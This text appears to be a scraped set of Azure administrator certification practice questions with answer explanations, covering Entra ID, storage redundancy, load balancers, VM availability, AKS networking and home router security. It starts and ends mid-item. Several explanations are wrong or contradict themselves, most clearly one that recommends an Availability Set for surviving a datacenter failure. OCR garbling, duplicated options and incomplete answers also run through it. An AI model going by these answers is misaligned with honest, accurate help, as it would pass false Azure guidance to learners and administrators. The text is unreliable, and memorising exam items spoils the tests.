Step 1: Deploy a Gateway Subnet (d) Before you can create a VPN Gateway, you must reserve a subnet specifically for the gateway in your virtual network. The GatewaySubnet is required to host the VPN Gateway. Step 2: Deploy a VPN Gateway (b) A VPN Gateway is a virtual network gateway in Azure that enables encrypted communication between your on-premises network and Azure. The VPN Gateway is deployed in the GatewaySubnet. Step 3: Deploy a Local Network Gateway (a) A Local Network Gateway (LNG) represents your on-premises network in Azure. It stores your on-premises network’s public IP address and subnet information. Step 4: Deploy a VPN Connection (c) After both VPN Gateway (Azure) and Local Network Gateway (on-premises) are set up, you create a Site-to-Site VPN connection between them. This establishes secure connectivity between Azure and your on-premises environment.
Which choice correctly describes Microsoft Entra ID?
Microsoft Entra ID can be queried through LDAP
Microsoft Entra ID is primarily an identity solution
Microsoft Entra ID uses organizational units (OU) and group policy objects (GPOs)
Microsoft Entra ID (formerly Azure Active Directory, or Azure AD) is Microsoft’s cloud-based identity and access management (IAM) solution. It is primarily used for: User authentication and access control Single Sign-On (SSO) for apps and services Multi-Factor Authentication (MFA) Role-Based Access Control (RBAC) Identity Protection & Conditional Access Since Entra ID manages user identities and access permissions, it is primarily an identity solution rather than a traditional directory service.
You have a Microsoft Entra tenant that contains 5,000 user accounts. You create a new user account named AdminUser1. You need to assign the User Administrator administrative role to AdminUser1. What should you do from the user account properties?
From the Groups blade, invite the user account to a new group
From the Directory role blade, modify the directory role
From the Licenses blade, assign a new license
In Microsoft Entra ID (formerly Azure AD), administrative roles are managed through the Directory roles section of a user’s account. To assign the User Administrator role to AdminUser1, you need to: Go to Microsoft Entra ID (Azure AD) in the Azure portal. Select “Users” and search for AdminUser1. Click on “Assigned roles” or “Directory roles”. Modify the role by selecting “User Administrator” and saving the changes. This role grants AdminUser1 permission to manage user accounts, including: Creating, editing, and deleting users. Assigning and resetting passwords. Managing some user-related policies.
You are configuring a wireless router for a home office. Which modification will have the least effect on enhancing network security?
Changing the default username and password.
Disabling guest access.
Disabling the SSID broadcast.
Configuring WPA3.
Disabling the SSID broadcast (which hides the network name) has the least effect on enhancing network security because it only obscures the network from casual users—not from attackers. Skilled attackers using basic tools can still detect hidden networks through packet sniffing. Why the others are more effective: Changing the default username and password prevents unauthorized access to the router’s admin interface. Disabling guest access limits potential abuse of the network by untrusted users. Configuring WPA3 ensures the highest level of Wi-Fi encryption and protection available.
Microsoft Entra ID includes federation services, including third-party services.
Yes
No
Microsoft Entra ID (formerly Azure AD) includes federation services, allowing integration with third-party identity providers for Single Sign-On (SSO) and authentication. Key Features of Federation in Microsoft Entra ID: Supports Third-Party Identity Providers (IdPs) Microsoft Entra ID can federate with third-party services like: Google Okta PingFederate SAML 2.0 and OpenID Connect-based providers Supports Federated Authentication with On-Premises AD Microsoft Entra ID can federate with on-premises Active Directory (AD FS) to enable seamless authentication for users. Single Sign-On (SSO) for Cloud and On-Premises Apps Users can log in once and access Microsoft 365, Azure, and third-party SaaS applications without needing separate credentials. Custom Federation via Microsoft Entra ID B2B & B2C Microsoft Entra B2B (Business-to-Business): Enables external users (partners, suppliers) to access resources using their own identity provider. Microsoft Entra B2C (Business-to-Consumer): Allows customers to sign in with Google, Facebook, Twitter, or any other IdP.
An identity defines a dedicated and trusted instance of Microsoft Entra ID?
Yes
No
An identity in Microsoft Entra ID refers to a user, service, or device that is authenticated and authorized to access resources. However, an identity does NOT define a dedicated and trusted instance of Microsoft Entra ID. Instead, a Microsoft Entra tenant (formerly called Azure AD tenant) is what represents a dedicated and trusted instance of Microsoft Entra ID.
Azure tenant defines a dedicated and trusted instance of Microsoft Entra ID?
Yes
No
An Azure tenant (also known as a Microsoft Entra ID tenant) is a dedicated and trusted instance of Microsoft Entra ID that organizations use to manage identities and access. Key Points: Dedicated Instance: Each organization gets a separate and isolated Microsoft Entra ID tenant. This ensures that identity management, authentication, and authorization are specific to that organization. Trust & Security: The tenant is trusted because Microsoft guarantees its security, compliance, and access management features. It enables organizations to securely manage users, groups, and applications. Scope of an Azure Tenant: It manages identity for users, devices, and applications. It controls access to Azure resources and Microsoft 365 services. Example: Company: Contoso Ltd. Azure Tenant: contoso.onmicrosoft.com The tenant is a trusted instance that Contoso uses to manage all its users, apps, and security policies.
You plan to deploy three Azure virtual machines named VM1, VM2 and VM3, The virtual machines will host a web app named App1. You need to ensure that at least two virtual machines are available if a single Azure datacenter becomes unavailable. What should you deploy?
each virtual machine in a separate Availability Zone
each virtual machine in a separate Availability Set
all virtual machines in a single Availability set
all three virtual machines in a single Availability Zone
In Azure, Availability Sets and Availability Zones are used to improve the availability and reliability of virtual machines (VMs). Here’s why an availability Set is the right choice in this case: 1. Understanding Availability Sets An Availability Set ensures that VMs are distributed across multiple fault domains and update domains within a single Azure datacenter. Fault domains (FDs) represent physical separation within the datacenter to protect against hardware failures. Update domains (UDs) ensure that VMs are updated one at a time to avoid downtime. If a single datacenter experiences an issue, at least some VMs in the availability set will remain operational. 2. Why Availability Zones are NOT Needed? Availability Zones (AZs) provide protection against datacenter failures by spreading VMs across multiple zones. However, since the question asks for protection if a single datacenter fails, an Availability Set within a single region is sufficient. AZs are useful when needing high redundancy across different datacenters, but they introduce additional complexity and potential latency.
You have an Azure subscription that contains several hundred virtual machines. You need to identify which virtual machines are underutilized. What should you use?
Azure Advisor
Azure Monitor
Azure policies
Advisor is a digital cloud assistant that helps you follow best practices to optimize Azure deployments. It analyzes your resource configuration and usage telemetry and then recommends solutions that can help you improve the cost effectiveness, performance, reliability, and security of your Azure resources. Azure provides multiple tools for monitoring and optimizing cloud resources. In this case, Azure Advisor is the best choice because it provides recommendations for underutilized virtual machines (VMs) to help optimize costs. Why Azure Advisor? Azure Advisor analyzes resource usage patterns and gives recommendations for cost savings, security improvements, and best practices. It identifies underutilized VMs by checking their CPU and network activity over a period of time. If a VM has consistently low utilization (e.g., low CPU usage or low network traffic), Azure Advisor suggests downsizing, shutting down, or reconfiguring the VM to reduce costs. It provides right-sizing recommendations for VM types based on actual usage.
You host a service with two Azure virtual machines. You discover that occasional high traffic causes your instances to not respond or even to fail. Which two actions can you do to minimize the impact of the unusual traffic without reducing the performance of your architecture?
Add a load balancer and put the virtual machines in a scale set.
Put the virtual machines in a scale set and add a new NSG to the subnet
Add a network gateway to the Virtual Network.
Add a load balancer and put the virtual machines in an availability set
Your issue is that occasional high traffic is causing your virtual machines (VMs) to become unresponsive or even fail. To minimize the impact without reducing performance, you need to: Distribute the incoming traffic efficiently so that no single VM gets overloaded. Automatically scale the number of VMs based on traffic spikes to handle unexpected high loads. The best solution for this is: 1. Add a Load Balancer Azure Load Balancer distributes incoming traffic across multiple VMs, ensuring that no single VM is overwhelmed. It improves fault tolerance and high availability by redirecting requests to healthy VMs if one fails. This prevents downtime due to a single overloaded VM. 2. Use a Virtual Machine Scale Set (VMSS) A VM scale set automatically adds or removes VMs based on real-time traffic and workload demand. This ensures that during high traffic periods, additional VMs are provisioned automatically, and when traffic decreases, extra VMs are removed to optimize costs. Scale sets work well with load balancers, ensuring efficient distribution of incoming requests. Why Other Options Are Incorrect? Putting VMs in a scale set and adding an NSG to the subnet is not effective because NSGs only control access (security rules) and do not help with traffic distribution or scaling. Adding a network gateway to the Virtual Network is irrelevant because gateways are used for VPN or hybrid cloud connections, not for handling traffic spikes. Using a load balancer with an availability set improves uptime but does not automatically scale VMs based on demand.
You have an Azure virtual network that contains two subnets named Subnet1 and Subnet2. You have a virtual machine named VM1 that is connected to Subnet1. VM1 runs Windows Server. You need to ensure that VM1 is connected directly to both subnets. What should you do first?
From the Azure portal, add a network interface
From the Azure portal, create an IP group
From the Azure portal, modify the IP configurations of an existing network interface.
Sign into Windows Server and create a network bridge
In Azure, a virtual machine (VM) is connected to a subnet through a network interface card (NIC). Each NIC is assigned to one subnet within a virtual network. Since VM1 is already connected to Subnet1, to allow it to connect directly to both Subnet1 and Subnet2, you need to add an additional network interface that connects to Subnet2. Steps to Achieve This: Add a second network interface (NIC) to VM1 through the Azure portal. Attach this new NIC to Subnet2 so the VM has direct connectivity to both subnets. Configure the IP settings to ensure proper communication across subnets. Inside the VM, configure Windows Server to recognize and use both network interfaces properly. Why Other Options Are Incorrect? (b) Create an IP group An IP group in Azure is used for managing security rules, such as NSG (Network Security Group) rules. It does not allow a VM to connect to multiple subnets. (c) Modify the IP configurations of an existing network interface You cannot change the subnet assignment of an existing NIC after the VM is deployed. The only way to connect to both subnets is by adding a new NIC that belongs to Subnet2. (d) Sign into Windows Server and create a network bridge A network bridge allows a VM to act as a router between subnets, but it does not make the VM directly connected to both subnets. Azure networking does not support this approach for connecting a VM to multiple subnets.
You have an Azure subscription that contains several Azure runbooks. The runbooks run nightly and generate reports. The runbooks are configured to store authentication credentials as variables. You need to replace the authentication solution with a more secure solution. What should you use?
Azure Active Directory (Azure AD) Identity Protection
Azure Key Vault
an access policy
an administrative unit
Your goal is to replace authentication credentials stored as variables in Azure runbooks with a more secure solution. The best way to store and manage sensitive information, such as authentication credentials, is Azure Key Vault. Why Azure Key Vault? Securely stores secrets, keys, and certificates rather than keeping credentials in runbook variables. Provides access control through Azure Role-Based Access Control (RBAC) and Access Policies to ensure only authorized services can retrieve secrets. Supports automatic secret rotation, reducing security risks associated with hardcoded credentials. Integrates easily with Azure Automation runbooks, allowing them to securely retrieve credentials when needed. Why Other Options Are Incorrect? (a) Azure Active Directory (Azure AD) Identity Protection Identity Protection is used for detecting and mitigating identity-related risks, such as compromised accounts. It does not store authentication credentials securely for runbooks. (c) An access policy Access policies define who can access a resource but do not store credentials themselves. While Key Vault uses access policies to control access, the actual solution for storing credentials is still Azure Key Vault. (d) An administrative unit Administrative units in Azure AD are used to delegate management of users and groups in large organizations. They do not handle authentication credentials for runbooks.
Your wireless network has been functioning well, but suddenly you are inundated with calls from employees who can’t access the network. You believe that a disgruntled employee who was just fired is causing network interference in order to perpetrate a Dos attack. What is a temporary solution in this situation?
Have everyone log off their computers and back on.
Set your router to use a different channel.
Restore the router to factory defaults.
Reset the router.
Changing the router’s Wi-Fi channel is a quick and effective temporary solution to avoid wireless interference—especially if a disgruntled former employee is using a device to jam or interfere with your current channel. Wi-Fi operates on specific frequency channels, and shifting to a different one can bypass the interference temporarily and restore network functionality. Why the others aren’t ideal as immediate solutions: Having everyone log off and back on won’t help if the issue is interference or a DoS attack. Restoring the router to factory defaults is extreme and time-consuming, and you’d lose current settings. Resetting the router might briefly restore service but won’t stop continued interference.
Your company has a general-purpose V’1 Azure Storage account named storage1 that uses locally-redundant storage (LRS). You are tasked with implementing a solution that ensures the data in the storage account is protected if a zone fails. The solution must minimize costs and administrative effort. What should you do first?
Configure Object replication rules
Create a new storage account
Modify the replication settings of the storage account
Upgrade the account to general purpose V2
Your goal is to protect data if a zone fails while minimizing costs and administrative effort. The best way to achieve this is to upgrade the storage account to General Purpose V2 (GPv2) because GPv2 supports zone-redundant storage (ZRS), which LRS (Locally Redundant Storage) does not. Why Upgrade to General Purpose V2? General Purpose V1 (GPv1) accounts do not support ZRS LRS (Locally Redundant Storage) only keeps three copies of data within a single datacenter, making it vulnerable to zone failures. GPv1 does not allow an upgrade to ZRS directly. General Purpose V2 (GPv2) accounts support Zone-Redundant Storage (ZRS) After upgrading to GPv2, you can change the replication setting to ZRS to protect data across multiple availability zones. ZRS ensures that if a zone fails, data remains accessible from another zone. GPv2 also supports Geo-Zone Redundant Storage (GZRS) for even greater redundancy. Cost-Effective & Minimal Administrative Effort Upgrading from GPv1 to GPv2 does not require creating a new storage account or migrating data manually. It improves performance and adds features like lifecycle management, tiering, and ZRS without increasing costs significantly. Why Other Options Are Incorrect? (a) Configure Object Replication Rules Object replication only applies to blob storage and requires two separate storage accounts. It does not provide automatic zone redundancy like ZRS does. (b) Create a New Storage Account Creating a new account and migrating data manually is unnecessary and requires additional administrative effort. Upgrading to GPv2 is a simpler solution. (c) Modify the Replication Settings of the Storage Account In GPv1, replication settings (like LRS to ZRS) cannot be modified directly. First, you must upgrade to GPv2, then change the replication setting to ZRS or GZRS.
You need to create an Azure Storage account that meets the following requirements: + Minimizes costs «Supports hot, cool, and archive blob tiers + Provides fault tolerance if a disaster affects the Azure region where the account resides How should you complete the command? az storage account create -g RG1 –n storageaccount1 ~ kind 72? -sku 722 To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. –kind
File Storage
Storage
StorageV2
To meet the requirements—minimizing costs, supporting multiple blob tiers (hot, cool, archive), and ensuring fault tolerance across regions—the correct option for –kind is StorageV2. Breakdown of the Requirements: Minimizing Costs StorageV2 provides cost-efficient options like tiering (Hot, Cool, Archive) for Blob Storage, allowing you to optimize costs by storing infrequently accessed data in cheaper tiers. Supporting Hot, Cool, and Archive Blob Tiers Only StorageV2 supports all three blob tiers: Hot: Optimized for frequently accessed data Cool: Cost-effective for infrequently accessed data Archive: The cheapest option for rarely accessed data (e.g., backups, compliance data) Providing Fault Tolerance Across Regions You need a geo-redundant storage (GRS) option for disaster recovery. StorageV2 supports replication options like Geo-Redundant Storage (GRS) and Geo-Zone-Redundant Storage (GZRS), which replicate data across multiple Azure regions. Why Other Options Are Incorrect? FileStorage Used for Azure Files, not Blob Storage. Does not support hot, cool, and archive tiers. Storage This is the older (classic) storage account type, mainly for backward compatibility. Does not support all blob tiering options (Cool and Archive tiers are missing). Does not provide the cost efficiency and replication options available in StorageV2.
You need to create an Azure Storage account that meets the following requirements: + Minimizes costs «Supports hot, cool, and archive blob tiers + Provides fault tolerance if a disaster affects the Azure region where the account resides How should you complete the command? az storage account create -g RG1 –n storageaccount1 ~ kind 72? -sku 722 To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. –sku
Standard GRS
Standard_LRS
Standard_RAGRS
Premium_LRS
To meet the given requirements—minimizing costs, supporting hot, cool, and archive blob tiers, and ensuring fault tolerance across regions—the correct option for –sku is Standard_GRS (Geo-Redundant Storage). Breakdown of the Requirements: Minimizing Costs Standard_GRS is a cost-effective storage option that supports Blob Storage tiering (Hot, Cool, Archive). Premium_LRS, while high-performance, is significantly more expensive and is not needed for blob tiering. Supports Hot, Cool, and Archive Blob Tiers Only Standard storage tiers (LRS, GRS, and RAGRS) support all three blob tiers. Premium_LRS does not support tiering and is optimized for workloads requiring low latency and high throughput, such as virtual machine disks. Provides Fault Tolerance in Case of a Regional Disaster Geo-Redundant Storage (GRS) ensures disaster recovery by automatically copying data to a secondary Azure region. If the primary region fails, Microsoft initiates a failover to the secondary region. LRS (Locally Redundant Storage) does not provide regional redundancy and only replicates within a single data center. Why Other Options Are Incorrect? Standard_LRS Only stores three copies of data in a single datacenter. Does not provide regional fault tolerance in case of disaster. Fails to meet the disaster recovery requirement. Standard_RAGRS Read-Access Geo-Redundant Storage (RAGRS) provides read access to the secondary region before a failover. While it enhances availability, it is more expensive than GRS. Since the question asks to minimize costs, Standard_GRS is a better option unless read-access to the secondary region is explicitly needed. Premium_LRS Used for high-performance workloads such as VM disks and databases. Does not support hot, cool, and archive blob tiers. Much more expensive than Standard_GRS, making it a poor choice for cost efficiency.
You have an Azure virtual machine named VM1. VM1 was deployed by using a custom Azure Resource Manager template named ARM1.json. You receive a notification that VM1 will be affected by maintenance. You need to move VM1 to a different host immediately. Solution: From the Update management blade, you click Enable. Does the solution meet the goal?
Yes
No
The goal is to move VM1 to a different host immediately to avoid maintenance impact. However, enabling Update Management from the Update Management blade does not achieve this. Why does this solution fail? Update Management is used to manage and automate software updates (patches) for VMs. It does not move the VM to a different host or help in avoiding maintenance-related downtime. Even if Update Management is enabled, the VM will still experience downtime if the host undergoes maintenance. Correct Approach to Move VM1 to a Different Host Immediately To move VM1 to a different physical host immediately, you should use one of the following methods: Redeploy the VM This forces Azure to migrate the VM to a new host. Steps: Open Azure Portal Navigate to VM1 Go to Settings > Redeploy Click Redeploy PowerShell Command: Set-AzVM -ResourceGroupName “YourRG” -Name “VM1” -Redeploy Live Migration (for Planned Maintenance Events) If Azure has scheduled maintenance and Live Migration is supported, Azure may automatically move the VM without downtime. Check for maintenance events in Azure Service Health and use Maintenance Configurations for scheduled moves.
You have an Azure Storage account named storage1. You plan to use AzCopy to copy data to storage1. You need to identify the storage services in the storage1 to which you can copy the data Which storage services should you identify?
blob and file only
blob, table, and queue only
file and table only
blob, file, table, and queue
file only
AzCopy is a command-line tool used to copy data to and from Azure Storage. It supports copying data to specific storage services within an Azure Storage account. The two storage services that AzCopy supports for data transfer are: Azure Blob Storage (for unstructured data like images, videos, and backups) Azure File Storage (for file shares and network file systems) Why Only Blob and File Storage? Azure Blob Storage AzCopy supports uploading, downloading, and copying blobs (Block blobs, Append blobs, and Page blobs). Useful for backup, archival, and serving large-scale unstructured data. Azure File Storage AzCopy allows transferring files to and from Azure file shares. Used for network-attached storage (NAS) scenarios, application sharing, and lift-and-shift migrations. Why Other Options Are Incorrect? (b) Blob, Table, and Queue only ? Table storage and Queue storage do not support AzCopy. Table and Queue storage manage structured and messaging data, not files or blobs. (c) File and Table only ? Table storage is not supported for AzCopy. Only File and Blob storage can be used. (d) Blob, File, Table, and Queue ? AzCopy does not support Table or Queue storage. Only Blob and File storage are valid options. (e) File only ? Blob storage is also supported, making this answer incorrect.
You plan to deploy an Azure virtual machine based on a basic template stored in the Azure Resource Manager (ARM) library. What can you configure during the deployment of the template? Select only one answer.
the disk assigned to a virtual machine
the operating system
the resource group
the size of the virtual machine
When deploying an Azure Virtual Machine (VM) from an Azure Resource Manager (ARM) template, you can configure several parameters. However, some configurations are fixed within the template, while others can be customized at deployment time. One of the key configurations you can define during deployment is the disk assigned to the VM. Why is “Disk Assigned to Virtual Machine” the Correct Answer? ARM Templates Support Disk Configuration When deploying a VM via an ARM template, you can specify: OS disk type (Premium SSD, Standard SSD, Standard HDD, etc.) Size of the OS disk Additional data disks These parameters can be modified before deployment, making the disk configuration flexible. Storage Account or Managed Disks You can configure the disk type and whether it should use Azure Managed Disks or unmanaged disks. You can also attach existing disks or create new ones dynamically. Why Are Other Options Incorrect? (b) The Operating System ? The OS is predefined in the template when the VM image is selected. If the template is designed for Windows, you cannot change it to Linux at deployment time without modifying the template itself. (c) The Resource Group ? The resource group must be defined before deployment, and while you can choose where to deploy resources, it is not a configurable setting inside the ARM template itself. (d) The Size of the Virtual Machine ? The VM size (SKU) is typically pre-defined within the template. You can modify it before deployment by editing the template, but the deployment process itself does not allow for changing the VM size dynamically.
You have an Azure subscription that contains a resource group named RG1. You plan to create a storage account named storage. You have a Bicep file named File1. You need to modify File1 so that it can be used to automate the deployment of storage1 to RG1. Which property should you modify?
scope
kind
sku
location
When deploying Azure resources using Bicep, you must ensure that the deployment is correctly targeted to a specific resource group, subscription, or management group. This is defined using the scope property. Since you are deploying the storage1 account to the RG1 resource group, you must modify the scope in File1 to ensure the Bicep file correctly places the storage account in the intended resource group. Why is “Scope” the Correct Answer? Scope Defines Where the Resource Will Be Deployed In Bicep, scope determines where the resource is deployed. Since you want to deploy storage1 to RG1, you must ensure that the Bicep file correctly targets this resource group. Example of setting the scope in a Bicep file: targetScope = ‘resourceGroup’ Incorrect Scope Leads to Deployment Failure If the scope is not set properly, the deployment might fail or deploy the resource to the wrong location (e.g., the subscription level instead of a resource group). Ensuring the correct resource group scope allows automation to work as intended. Why Are Other Options Incorrect? (b) Kind ? The kind property defines the type of storage account (BlobStorage, StorageV2, FileStorage). While this is important for functionality, it does not determine where the storage account is deployed. (c) SKU ? The SKU property defines the performance tier of the storage account (e.g., Standard_LRS, Premium_LRS). It does not control the resource’s placement or automation deployment. (d) Location ? The location property defines the Azure region (e.g., eastus, westus), but not the resource group where the storage account is deployed. While location is necessary, it does not control deployment automation to the correct resource group.
You have an Azure subscription that contains the virtual machines shown in the following table. You deploy a load balancer that has the following configurations: a) Name: LB 1 b) Type: Internal c) SKU: Standard d) Virtual network: VNET1 You need to ensure that you can add VM1 and VM2 to the backend pool of L81. Solution: You create a Basic SKU public IP address, associate the address to the network interface of VM1, and then start VM1. Does this meet the goal?
Yes
No
The solution does not meet the goal because: Load Balancer SKU Mismatch (Standard vs. Basic) LB1 is a Standard SKU Load Balancer, but the proposed solution associates a Basic SKU Public IP to VM1. Standard Load Balancers require VMs to have a Standard SKU Public IP or no Public IP at all. Basic SKU Public IPs are not compatible with Standard Load Balancers. Stopped (Deallocated) VM Issue VM1 is in a Stopped (Deallocated) state, meaning it is not active on the network. Even if a public IP is assigned, VM1 must be running to be added to the backend pool. Internal Load Balancer (No Public IP Needed) LB1 is an Internal Load Balancer, meaning it does not use Public IPs at all. Assigning a Public IP to VM1 does not help in configuring the backend pool for an Internal Load Balancer. The VMs should be in the same Virtual Network (VNET1) without requiring Public IPs. Correct Approach: To add VM1 and VM2 to the backend pool of LB1, you should: Ensure both VMs are running (Start VM1). Ensure both VMs are in the same Virtual Network (VNET1). Do not associate a Public IP (Public IPs are not needed for an Internal Load Balancer). Ensure both VMs have a Standard SKU Network Interface (to be compatible with a Standard SKU Load Balancer).
You have an Azure subscription that contains the virtual machines shown in the following table. You deploy a load balancer that has the following configurations: a) Name:LB1 b) Type: Internal ° c) SKU: Standard d) Virtual network: VNET1 You need to ensure that you can add VM1 and VM2 to the backend pool of LB1 Solution: You disassociate the public IP address from the network interface of VM2. Does this meet the goal?
Yes
No
The proposed solution does not meet the goal because disassociating the public IP address from VM2 alone is not enough to add VM1 and VM2 to the backend pool of LB1. Key Issues with the Solution: Load Balancer SKU Mismatch (Standard vs. Basic) LB1 is a Standard SKU Load Balancer. Standard Load Balancers require all backend VMs to have Standard SKU network interfaces (NICs) and Standard SKU Public IPs (if any). VM2 currently has a Basic SKU Public IP, which is incompatible with Standard Load Balancers. Simply disassociating the Public IP does not upgrade the NIC to Standard SKU. VM1 is Stopped (Deallocated) VM1 is currently deallocated, meaning it is not active on the network and cannot be added to the backend pool. The VM must be started first before it can participate in the backend pool. Internal Load Balancer Does Not Require Public IPs Since LB1 is an Internal Load Balancer, public IPs are not needed at all for backend VMs. However, simply removing the Public IP from VM2 does not ensure it meets all the requirements for being added to an Internal Standard Load Balancer. Correct Approach to Fix the Issue: To successfully add VM1 and VM2 to the backend pool of LB1, you need to: Start VM1 (so it becomes active and available on the network). Ensure both VMs have network interfaces with Standard SKU (not Basic). Ensure both VMs do not have incompatible Basic SKU Public IPs (either remove them or replace them with Standard SKU Public IPs if needed). Ensure both VMs are in the same Virtual Network (VNET1).
You have an Azure subscription that contains the virtual machines shown in the following table. You deploy a load balancer that has the following configurations: a) Name: LB 1 b) Type: Internal c) SKU: Standard d) Virtual network: VNET1 You need to ensure that you can add VM1 and VM2 to the backend pool of LB1 Solution: You create a Standard SKU public IP address, associate the address to the network interface of VM1, and then stop VM2. Does this meet the goal?
Yes
No
The proposed solution does not meet the goal because adding a Standard SKU public IP to VM1 and stopping VM2 does not resolve the key requirements for adding both VMs to the backend pool of LB1. Key Issues with the Solution: Stopping VM2 Removes It from the Network ? VM2 needs to be running to be added to the backend pool. Stopping VM2 prevents it from being part of the load balancer’s backend pool. The solution should ensure both VMs are running, not stopped. Public IP Address is Not Required for an Internal Load Balancer ? LB1 is an Internal Load Balancer, which means it is used for private communication within the virtual network (VNET1). Internal Load Balancers do not require public IPs on backend VMs. Associating a Standard SKU Public IP to VM1 does not help in adding it to the backend pool. VM1 Must Be Running ? VM1 is currently stopped (deallocated). Even if a Standard SKU Public IP is added, VM1 must be started to be added to the backend pool. Load Balancer SKU Compatibility ? Standard Load Balancers require all backend VMs to use Standard SKU network interfaces (NICs). While adding a Standard SKU Public IP ensures compatibility with the Load Balancer, it is not a required step for an Internal Load Balancer. Correct Approach to Fix the Issue: To successfully add VM1 and VM2 to the backend pool of LB1, you should: ? Start VM1 (so it becomes active on the network). ? Ensure both VMs have network interfaces with Standard SKU (not Basic). ? Ensure both VMs are in the same Virtual Network (VNET1). ? Ensure VM2 remains running.
You are configuring a network and router for a SOHO company. There are wired and wireless connections to the router. What is NOT a way to secure the router and network?
Disable any guest accounts on the network. If guests need access, set up a separate VPN for them.
Ensure that the Wi-Fi signal doesn’t extend beyond the required area, and if it does, lower the power of the Wi-Fi signal.
Place the router in the kitchen area for easy access.
Place the router in an area that can be locked.
Placing the router in the kitchen area for easy access is not a secure practice. Routers should be placed in physically secure locations, preferably where access can be controlled or locked, to prevent unauthorized physical tampering or resets. Why the other options are good security practices: Disabling guest accounts and setting up separate VPN access for guests ensures that unauthorized users can’t access sensitive network resources. Adjusting the Wi-Fi signal range helps prevent the signal from reaching outside the physical premises, reducing the chance of external attacks. Locking up the router prevents physical tampering or unauthorized reset attempts. Keeping the router in a common, easily accessible area like a kitchen may be convenient, but it compromises physical network security.
You have an Azure subscription that contains the virtual machines shown in the following table. You deploy a load balancer that has the following configurations: a) Name: LB1 b) Type: Internal c) SKU: Standard d) Virtual network: VNET1 You need to ensure that you can add VM1 and VM2 to the backend pool of LB1 Solution: You create two Standard SKU public IP addresses and associate a Standard SKU public IP address to the network interface of each virtual machine. Does this meet the goal?
Yes
No
? Ensure VM1 is running before adding it to the backend pool. ? Upgrade the network interfaces (NICs) of VM1 and VM2 to Standard SKU. ? Do NOT assign Public IPs—they are not needed for an Internal Load Balancer.
You have an Azure subscription that contains a resource group named RG1. RG1 contains an Azure virtual machine named VM1. You need to use VM1 as a template to create a new Azure virtual machine. Which three methods can you use to complete the task? Each correct answer presents a complete solution. Select all answers that apply.
From Azure Cloud Shell, run the Get-AZVM and New-AzVM cmdlets.
From Azure Cloud Shell, run the Save-AzDeploymentScriptLog and New AzResourceGroupDeployment cmdlets.
From Azure Cloud Shell, run the Save-AzDeploymentTemplate and New-AzResourceGroupDeployment cmdlets.
From RG1, select Export template, select Download, and then, from Azure Cloud Shell, run the New-AzResourceGroupDeployment cmdlet
From VM, select Export template, and then select Deploy.
To create a new Azure virtual machine (VM) from an existing VM, you need to capture the configuration of the existing VM and use it to deploy a new instance. The correct approach is: Export the template from the Resource Group (RG1) The Export template option allows you to generate an Azure Resource Manager (ARM) template that contains all the necessary configurations for VM1. Download the template This template includes the VM’s settings such as size, OS disk, networking, and storage configuration. Deploy the new VM using Azure Cloud Shell Using the New-AzResourceGroupDeployment cmdlet, you can deploy a new VM using the exported ARM template. Why This Works? ARM templates allow for infrastructure as code, enabling you to redeploy resources in a repeatable way. The New-AzResourceGroupDeployment cmdlet is specifically designed to deploy resources based on an ARM template. This method ensures that the new VM matches the original VM’s configuration exactly, making it ideal for cloning or creating consistent environments. Other Options Analysis: ? Get-AzVM and New-AzVM (Option A) Incorrect because Get-AzVM retrieves VM properties, but does not capture the entire VM configuration for redeployment. New-AzVM is used for creating VMs but requires manual configuration, making it less efficient. ? Save-AzDeploymentScriptLog and New-AzResourceGroupDeployment (Option B) Incorrect because Save-AzDeploymentScriptLog is used for saving deployment logs, not for exporting VM configurations. ? Save-AzDeploymentTemplate and New-AzResourceGroupDeployment (Option C) Partially correct but not the best answer. Save-AzDeploymentTemplate is used to capture deployment details, but it is not the standard method for exporting VM templates. Exporting from RG1 is the recommended way. ? Export template from VM and Deploy (Option E) Incorrect because exporting from the VM blade does not provide a full ARM template that includes networking and storage settings. The correct approach is exporting the template from the resource group (RG1) since it contains all dependencies.
How many resource groups are created for each AKS deployment?
1
2
3
4
When you deploy an Azure Kubernetes Service (AKS) cluster, two resource groups are created automatically: 1?? The Resource Group You Specify This is the resource group where the AKS cluster is deployed. It contains the Kubernetes control plane components and other AKS-related resources. You manually specify this resource group when creating the AKS cluster. 2?? The Managed Resource Group (Auto-Created) Azure automatically creates a second resource group to manage infrastructure resources like: Virtual machines (VMs) for worker nodes Networking resources (Load Balancer, Public IPs, Virtual Network, etc.) Disks and Storage accounts The name of this resource group follows the format: MC_
You deploy an Azure Kubernetes Service (AKS) cluster that has the network profile shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. Containers will be assigned an IP address in the ______ subnet
10.244.0.0/16
10.0.0.0/16
172.17.0.1/16
In an Azure Kubernetes Service (AKS) cluster, the Pod CIDR (Classless Inter-Domain Routing) defines the IP range for pod networking. Looking at the network profile, we see the following configuration: Pod CIDR: 10.244.0.0/16 Service CIDR: 10.0.0.0/16 DNS Service: 10.0.0.10 Docker Bridge CIDR: 172.17.0.1/16 Why is the correct answer 10.244.0.0/16? Pod CIDR (10.244.0.0/16) is specifically assigned to pods running inside AKS. Each pod in the cluster will be assigned an IP from this range. Service CIDR (10.0.0.0/16) is for internal Kubernetes services (e.g., ClusterIP services). Docker Bridge CIDR (172.17.0.1/16) is used for the Docker network, which is separate from the AKS Pod IPs.
You deploy an Azure Kubernetes Service (AKS) cluster that has the network profile shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. Services in the AKS cluster will be assigned an IP address in the ——— subnet
10.244.0.0/16
10.244.0.0/16
172.17.0.1/16 PEE
In Azure Kubernetes Service (AKS), the Service CIDR defines the IP range used for Kubernetes services such as ClusterIP, LoadBalancer, and NodePort services. Looking at the network profile, we see the following configurations: Pod CIDR: 10.244.0.0/16 (used for pod networking) Service CIDR: 10.0.0.0/16 (used for Kubernetes services) DNS Service IP: 10.0.0.10 (an IP from the Service CIDR) Docker Bridge CIDR: 172.17.0.1/16 (used for Docker networking) Why is the correct answer 10.0.0.0/16? Kubernetes Services (like ClusterIP, LoadBalancer, and NodePort) need a separate IP range to avoid conflicts with Pod IPs. The Service CIDR (10.0.0.0/16) is used to allocate IP addresses for these services. For example, the Cluster DNS service (10.0.0.10) is assigned from this Service CIDR.
You have an Azure subscription that contains an Azure Active Directory (Azure AD) tenant named contoso.com and an Azure Kubernetes Service (AKS) cluster named AKS1. An administrator reports that she is unable to grant access to AKST to the users in contoso.com. You need to ensure that access to AKS1 can be granted to the contoso.com users. What should you do first?
From AKS1, create a namespace
From contoso.com, create an OAuth 2.0 authorization endpoint
